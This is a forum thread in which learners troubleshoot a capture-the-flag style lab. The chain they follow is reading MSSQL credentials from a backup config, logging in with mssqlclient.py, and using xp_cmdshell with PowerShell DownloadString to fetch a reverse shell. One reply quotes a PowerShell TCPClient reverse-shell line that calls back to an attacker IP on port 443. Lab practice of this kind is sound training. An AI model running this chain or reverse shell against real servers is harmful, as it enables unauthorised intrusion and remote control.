After executing the xp_cmdshell command I’m not getting any output. I have changed the IP address in DownloadString to my IP address also. Can anyone help me out with this?
Same issue I am also facing. Stuck on this point.
Do you have the http server and the nc open in their own separate terminals?
Have you been returned to the SQL> prompt? If that hasn’t returned, try looking at one of your other terminal windows. I was stuck on this for ages.
Also, did you change the IP address in the PowerShell reverse shell?
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443) ← change this too if not
Currently, I’m running into this issue. Below is the following setup I have for this project.
The filename.ovpn loads as intended and it is located within the Starting Point folder.
The smbclient accesses the backups folder for 10.10.10.27 and I’m able to get the prod.dtsConfig to obtain the password and user ID.
Within the impacket example folder, I use the python script mssqlclient.py with the User ID and the starting point IP. This allows me to enter in the password and proceed to the xp_cmdshell command with the SQL command line. After that, I enter the command in the terminal to download and execute the reverse shell. After entering this command the 443 port listener doesn’t respond to the xp_cmdshell command.
On this terminal, I’m located in the Starting Point folder and I start the http server with port 80. After starting this command I go to the browser and type localhost and I observe the files located there. They are prod.dtsConfig, shell.ps1, and filename.ovpn. In addition, the shell.ps1’s IP is set to mine and not the 10.10.10.27 IP.
While located within the Starting Point folder I start the netcat command to listen on port 443.
Conclusion of the issue
When I enter the xp_cmdshell command in Terminal 3 no response occurs within Terminal 5 netcat listener. This is stopping the process at the end of the Foothold on the Starting Point Tutorial. Does anyone know what I’m doing wrong in the tutorial and what the solution is? Thanks in advance.